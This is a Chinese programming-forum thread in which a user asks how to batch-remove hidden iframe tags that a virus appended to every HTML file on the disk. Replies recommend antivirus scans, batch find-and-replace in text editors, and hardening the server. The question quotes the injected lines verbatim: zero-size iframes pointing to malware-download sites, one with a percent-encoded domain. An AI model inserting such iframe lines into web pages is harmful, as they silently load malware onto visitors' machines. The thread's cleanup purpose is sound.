日期:2014-05-17  浏览次数:20992 次

中毒!硬盘上所有htm文件源代码中最后都被自动写入iframe语句
最近中了流氓病毒,所有htm文件中最后均被插入流氓语句,打开任何htm文件都会使系统连接到流氓网站下载病毒。机器里好几百个htm文件,包括office等软件中安装的htm文件都被感染。虽然下载下来的病毒可以清理,但这好几百个htm文件手动清楚流氓语句,想想就头疼。而且手动清除完了,再中招又全都被感染了
有高人能指点高招可以批量清除吗?

<IfrAmE   src=http://www.851733.cn/htm/htm.htm   width=0   height=0> </IfrAmE>                                                          
<IfrAmE   src=http://%6C%6C%38%30%2E%63%6F%6D/xx/ip.htm   width=100   height=0> </IfrAmE>
<IfrAmE   src=http://www.851733.cn/htm/htm.htm   width=0   height=0> </IfrAmE>                                                          
<IfrAmE   src=http://%6C%6C%38%30%2E%63%6F%6D/xx/ip.htm   width=100   height=0> </IfrAmE>
<IfrAmE   src=http://www.851733.cn/htm/htm.htm   width=0   height=0> </IfrAmE>

------解决方案--------------------
楼主可以使用杀毒软件商网站上的免毒查杀病毒服务扫描看看

查杀病毒后,再用editplus等软件修复网页文件
------解决方案--------------------
最近流氓病毒太多,真是太可恨了。安装个瑞星盒卡卡吧!
------解决方案--------------------
呵呵,打开这个网页,也被提示插入IFRAME了。。。。哈哈
------解决方案--------------------
Purpleendurer(编程—> 任是无情也动人^_^) ( ) 信誉:100 2007-7-26 18:26:22 得分: 0



楼主可以使用杀毒软件商网站上的免毒查杀病毒服务扫描看看

查杀病毒后,再用editplus等软件修复网页文件



上次中了W32.Fubalca.N!html,就是用UE给批量改修复的。用Symantec的修复功能,3天都没修复完,而UE,15分钟左右就搞定了
------解决方案--------------------
1:首先检查下服务器是不是被人控制了。不然你怎么还原.马上都会被人改了.

2:用UE的批量查找替换功能。把所有的iframe这一行删掉.自动完成。很快.

3:把所有的htm文件设置不允许IIS进程用户修改.

4:加强系统防御..HTML是不会自己改的。要想办法找到源头
------解决方案--------------------
熊猫烧香作者编写的那个熊猫专杀可以让用户自己输入你上面说的那段FRAME代码
------解决方案--------------------
中毒了,俺不怕。俺用俺的杀软可以解决掉它。
------解决方案--------------------
找个Dreamweaver 3 运行后选择edit--> replace 第一个 选择要替换的包 第二个选择HTML
在右面输入要删除的代码 。然后按replace all
搞定!